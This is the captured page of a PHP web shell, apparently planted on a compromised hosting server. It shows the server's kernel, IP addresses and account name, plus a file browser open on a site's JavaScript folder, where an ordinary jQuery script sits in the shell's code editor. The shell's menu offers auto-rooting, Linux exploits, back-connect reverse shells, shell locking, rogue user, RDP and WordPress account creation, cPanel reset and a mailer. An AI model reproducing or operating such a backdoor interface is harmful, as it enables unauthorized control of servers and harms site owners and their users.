Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.116.10.235
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Tata-Inc /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
custom.js
768
B
-rw-r--r--
jquery-3.7.1.min.js
85.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
$(document).ready(function(){ $('.tabsv1-ul li').click(function(){ var tab_id = $(this).attr('data-tab'); $('.tabsv1-ul li').removeClass('current'); $('.tab-content').removeClass('current'); $(this).addClass('current'); $("#"+tab_id).addClass('current'); }); /* cart remove items */ $('.remove-btn').click(function(e){ e.preventDefault(); // Prevent default action of anchor tag $(this).closest('.cart-item-wrap').hide(); }); /* toogle */ $(".filter-heading").click(function () { $(this).parent('.filter-group-item').toggleClass("pb-00"); $(this).toggleClass("arrow-down"); $(this).next('.filter-content').slideToggle("fast"); }); });
Close